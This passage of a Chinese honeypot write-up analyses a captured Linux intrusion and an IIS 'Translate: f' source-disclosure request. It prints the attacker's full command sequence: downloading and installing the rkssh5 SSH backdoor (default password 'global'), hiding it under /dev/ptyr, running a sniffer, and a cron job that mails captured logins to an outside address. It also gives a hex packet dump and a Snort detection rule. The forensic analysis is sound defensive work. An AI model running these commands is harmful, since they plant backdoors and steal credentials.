p; for i in $(SUB); do rm $$i/*.o; done
for i in $(SHADOWSUB); do rm $$i/*.o; done
从代码分析中可以看出,rootkit的安装其实是个很有条理的入侵过程。首先把编译好的二进制文件放如bin目录中;利用if语句比较原系统文件和木马程序,并把系统文件的属性值赋予这些木马程序,使其看起来和正常的命令文件并无二致;最后,扫除编译时候所残留的工具。
这里顺便提到一点额外的知识,关于木马(trojan)的具体含义,许多专业bbs站点都有自己神话色彩的解释,于是混乱的解释干扰我们对木马的偏见认识,这里我给出RFC1244对其真实而朴质的描述:
“特洛伊木马是一种程序,它做某些有用的事情或者纯粹是一些有趣的事情。它总是做一些出人意料的事情。比如盗窃密码或者在没有你的认可下拷贝文件等。”
不管安装木马的作法会遭受Whitehat如何谴责,我们仍旧相信这种入侵的兴盛不衰正是强烈的控制欲诱惑让入侵者感到刺激和兴奋。
分析完毕rootkit的供效后,我们继续分析入侵者的剩余行为,发现了更为有趣的记录:
#mkdir /dev/ptyr
#cd /var/tmp/…
#lynx –source packetstormsecurity.nl/crypt/ssh/old/ssh-1.2.27.tar.gz >ssh-1.2.27.tar.gz
#lynx –source packetstormsecurity.nl/UNIX/penetration/rootkits/rkssh5.tar.gz \
>> rkssh5.tar.gz
#tar zxvf ssh-1.2.27.tar.gz
#tar zxvf rkssh5.tar.gz
#cp rkssh5/rk-ssh.diff ssh-1.2.27
#patch -p1 < rk-ssh.diff
#./configure –prefix=/dev/ptyr
#make
#make install
#cd ..
#rm –rf *
/* 以上入侵步骤是安装了一个打过补丁的SSHD服务器,并销毁其上载的文件。
* 于是查阅rkssh5的帮助文档,其作者声称是关于SSH的后门程序,所设置的默
* 认密码为 “global”,从跟踪记录看,入侵者并没有修改默认配置!而建立/dev/ptyr
*/ 目的则是为了隐藏。还记得rootkit中对ls工具的分析吗?J
入侵者继续扩大自己的战果,实现着自己的野心……相继修改/dev/ptyq,实现对3000端口的隐藏(netstat木马);修改/dev/ptys,实现对163.com字段的隐藏(syslogd木马);修改/dev/ptyp,实现对linsniffer和sshd进程的隐藏(ps木马)。
#/dev/ptyr/bin/sshd &
#./linsniffer > /dev/ptyr/tcp.log &
#crontab –e
* 1 * * * /sbin/sendmail vincenttp97@hotmail.com < /dev/ptyr/tcp.log
/* 运行ssh的后门程序,并且隐藏在3000端口进行监听;
* 运行linsniffer捕获网络环境的TCP连接(各种telnet、pop等认证会话);
* 最后,定制发送日志的时间,并且这些记录不会记录于系统日志中。
* 在整个精致的攻击过程,一切看来是完美无缺的。但是入侵者在定制
* 发送日志的时候,却留下了一个免费邮箱地址。对于一个敏锐的网络
* 管理员来说,它绝对是追查入侵者的有利线索!(本篇主要是针对入侵数据
*/ 做定性分析,因此不涉及反追踪技术的研究)
本次系统攻击,无论从端口扫描、远程溢出、Rootkit的安装还是从系统的窃听和监测等系列活动中,我们可以欣赏攻击者颇为文雅和谨慎的入侵风格。利用蜜罐系统,我们获得的更为真实的战斗场面,而且可以亲自观察这种巧妙入侵linux字符世界各种有趣行为。这种偷窥行为给我带来的愉快感绝不逊于入侵者侵蚀系统的宣泄郁愤的痛快心情。
IIS_Translate_F漏洞特征数字
Translate_F这个漏洞是IIS很早漏洞,之所以在这里对其进行数字解析的原因在于它是IIS存漏洞利用中比较经典的例子之一。在蜜罐的入侵侦测数据库中找到了根据漏洞的进行的攻击记录,以下是数据入侵的请求包:
08/18-12:53:14.293999 192.168.1.244:15253 -> 192.168.1.252:80
TCP TTL:53 TOS:0x0 ID:31083 DF
*****PA* Seq: 0x90F90192 Ack: 0x251D6AF2 Win: 0x2238
TCP Options => NOP NOP TS: 3060457 0
47 45 54 20 2F 70 61 67 65 73 2F 63 6F 6E 74 61 GET /pages/conta
63 74 2E 61 73 70 5C 20 48 54 54 50 2F 31 2E 30 ct.asp\ HTTP/1.0
0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 6C 69 ..User-Agent: li
62 77 77 77 2D 70 65 72&nbs
p;6C 2F 35 2E 34 35 0D 0A bwww-perl/5.45..
43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 Content-Type: te
78 74 2F 68 74 6D 6C 0D 0A 54 72 61 6E 73 6C 61 xt/html..Transla
74 65 3A 20 66 0D 0A 58 2D 46 6F 72 77 61 72 64 te: f..X-Forward
65 64 2D 46 6F 72 3A 20 32 30 39 2E 31 38 37 2E ed-For: 103.164.
31 34 30 2E 31 39 32 0D 0A 48 6F 73 74 3A 20 77 002.134..Host: w
77 77 2E 65 78 74 72 65 6D 65 6C 6F 67 69 63 2E ww.aaaaaaaaaaaa.
63 6F 6D 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E com..Content-Len
67 74 68 3A 20 31 38 0D 0A 56 69 61 3A 20 31 2E gth: 18..Via: 1.
31 20 6E 65 74 63 61 63 68 65 30 31 2E 67 77 2E 1 netcache01.aa.
74 6F 74 61 6C 2D 77 65 62 2E 6E 65 74 20 28 4E aaaaaaaaa.net (N
65 74 43 61 63 68 65 20 34 2E 30 52 34 44 31 31 etCache 4.0R4D11
29 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B )..Connection: K
65 65 70 2D 41 6C 69 76 65 0D 0A 0D 0A eep-Alive....
微软IIS5.0有一个专用搜索用于检索ASP、ASA和HTR等文件。这个引擎处理这些类型文件的请求并相应的处理它们,并在服务器执行它们。当在HTTP get请求语句中包括带有”Translate: f”的请求头文件,那么服务器会把对这些文件请求以源代码的形式发送给客户,从而造成网站密码泄露事件。
从此数据包中,我们可以明确的看出HTTP请求的试探语法:”Translate: f”的字符串。根据上述的分析经验,我们能很快确定其入侵规则检查语法:
alert TCP $EXTERNAL any -> $INTERNAL 80 (msg: "IDS305/web-iis_http-iis_translate_f"; flags: A+; content: "|4 72 61 6E 73 6C 61 74 65 3A 20 66 |"; nocase; classtype: info-attempt; reference: arachnids,305
注意:熟练掌握入侵规则的编写方法便利于网络管理员能灵活的增加各种入侵检测条件,日益完善入侵检测的规则机制,从而建立更加优秀的蜜罐系统。
通过对windows两个有趣实例的测试,我们结束了整个 上一页 [1] [2] [3] [4] [5] 下一页
|
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)